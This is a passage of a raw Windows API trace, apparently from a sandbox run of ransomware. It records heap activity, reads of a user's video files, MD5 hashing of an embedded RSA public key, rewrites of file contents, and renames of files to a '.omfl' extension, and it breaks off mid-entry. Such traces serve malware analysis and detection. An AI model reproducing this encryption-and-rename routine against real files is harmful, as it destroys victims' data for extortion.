1 [0131.713] GetCurrentThreadId () returned 0x618 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.713] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.713] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171f0 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd167e8 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.714] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.714] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171c0 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171f0 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171f0 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.715] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.715] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171f0 | out: hHeap=0x4970000) returned 1 [0131.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0131.716] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.716] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171c0 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171a8 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd350d0 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.717] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.717] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x9c06, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x9c06, lpOverlapped=0x0) returned 1 [0131.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.718] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x9c0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.718] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.718] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.718] WriteFile (in: hFile=0x610, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.718] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.718] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.718] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.718] CloseHandle (hObject=0x610) returned 1 [0131.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2758 [0131.720] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x74fb288 [0131.720] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2758 | out: hHeap=0x4970000) returned 1 [0131.720] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8m_9p0IgJbfO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8m_9p0igjbfo.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8m_9p0IgJbfO.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8m_9p0igjbfo.flv.omfl")) returned 1 [0131.721] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.721] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.721] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.722] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.722] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ffd21e0, ftCreationTime.dwHighDateTime=0x1d5db9e, ftLastAccessTime.dwLowDateTime=0x72a93210, ftLastAccessTime.dwHighDateTime=0x1d5db08, ftLastWriteTime.dwLowDateTime=0x72a93210, ftLastWriteTime.dwHighDateTime=0x1d5db08, nFileSizeHigh=0x0, nFileSizeLow=0x10b42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8V0CIT1lSY9X-f4.flv", cAlternateFileName="8V0CIT~1.FLV")) returned 1 [0131.722] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.722] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.722] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.722] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8V0CIT1lSY9X-f4.flv") returned=".flv" [0131.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8V0CIT1lSY9X-f4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8v0cit1lsy9x-f4.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.722] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=68418) returned 1 [0131.723] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.725] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x10b1c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.725] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.726] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.726] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.726] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.726] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x10b42, lpOverlapped=0x0) returned 1 [0131.727] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.727] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.727] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.727] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.727] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.728] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.728] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.728] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.728] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.728] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.728] GetLastError () returned 0x0 [0131.729] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.729] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.729] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.729] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.729] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.729] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.729] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.729] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.729] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.729] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10b40) returned 0xdd35410 [0131.729] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.730] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd350d0 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171a8 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35118 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171c0 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.730] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.730] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.730] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171c0 | out: hHeap=0x4970000) returned 1 [0131.730] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.730] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.730] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171c0 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd167e8 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.730] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.731] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.731] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.731] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.731] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.731] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0131.731] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171c0 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: 